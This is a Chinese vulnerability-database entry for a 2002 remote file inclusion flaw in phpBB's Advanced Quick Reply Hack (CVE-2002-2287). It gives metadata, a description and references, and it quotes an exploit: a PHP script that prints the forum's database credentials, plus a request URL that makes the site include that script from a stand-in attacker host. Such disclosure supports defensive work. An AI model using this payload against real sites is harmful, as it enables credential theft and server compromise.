PHPBB Advanced Quick Reply Hack远程文件包含漏洞

PHPBB Advanced Quick Reply Hack远程文件包含漏洞

漏洞ID 1107100 漏洞类型 代码注入
发布时间 2002-11-13 更新时间 2002-12-31
图片[1]-PHPBB Advanced Quick Reply Hack远程文件包含漏洞-安全小百科CVE编号 CVE-2002-2287
图片[2]-PHPBB Advanced Quick Reply Hack远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200212-506
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22017
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-506
|漏洞详情
phpBBAdvancedQuickReplyHack1.0.0版本和1.1.0版本的quick_reply.php存在PHP远程文件包含漏洞。远程攻击者可以借助phpbb_root_path参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6173/info

The phpBB Advanced Quick Reply Hack is prone to an issue which may allow attackers to include arbitrary files from a remote server.

It is possible for remote attackers to influence the include path for 'extension.inc' in the 'quick_reply.php' script. As a result, an attacker may cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver. 

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>

Then submit the following request to the host running the vulnerable software:

http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies
|参考资料

来源:XF
名称:phpbb-quickreply-file-include(10617)
链接:http://xforce.iss.net/xforce/xfdb/10617
来源:BID
名称:6173
链接:http://www.securityfocus.com/bid/6173
来源:BUGTRAQ
名称:20021113CodeInjectioninphpBBAdvancedQuickReplyMod
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0188.html

相关推荐: Linux kernel setuid进程CAP_SYS_RESOURCE漏洞

Linux kernel setuid进程CAP_SYS_RESOURCE漏洞 漏洞ID 1204901 漏洞类型 未知 发布时间 2001-12-31 更新时间 2001-12-31 CVE编号 CVE-2001-1551 CNNVD-ID CNNVD-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享